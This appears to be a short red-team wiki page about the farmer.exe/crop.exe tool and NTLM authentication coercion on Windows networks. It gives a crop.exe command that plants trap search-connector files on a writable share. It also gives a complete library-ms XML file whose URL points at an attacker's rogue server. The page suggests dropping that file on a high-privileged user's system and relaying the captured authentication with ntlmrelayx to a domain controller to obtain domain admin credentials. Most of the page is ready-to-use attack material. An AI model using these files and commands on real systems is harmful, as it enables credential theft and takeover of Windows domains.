# farmer.exe (crop.exe)
It farms stuff, like creds!  Read more [here](https://www.mdsec.co.uk/2021/02/farming-for-red-teams-harvesting-netntlm/).

## Set "trap" files that coerce authentication from vicim systems.  

```
crop.exe \\writablecomputer\writableshare _index.searchConnector-ms \\DNSNAME-OF-KALI@80\test
```

Head to the [webclientservicesscanner](/pentesting/Internal/webclientservicescanner) page to learn more about how to abuse WebClient.

## Create `library-ms` file to coerce authentication

Here's a sample file to drop on a high-privileged user's system.  If they browse to the folder this file (call it something like `index.library-ms`), an HTTP auth will fire to `\\dns-entry-for-your-rogue-server@80\test` and you could use something like ntlmrelayx to relay to a DC for free DA creds!

```
  <?xml version="1.0" encoding="UTF-8"?>
  <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
  <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
  <searchConnectorDescription>
  <isDefaultSaveLocation>true</isDefaultSaveLocation>
  <isSupported>false</isSupported>
  <simpleLocation>
  <url>\\dns-entry-for-your-rogue-server@80\test</url>
  </simpleLocation>
  </searchConnectorDescription>
  </searchConnectorDescriptionList>
  </libraryDescription>
  ```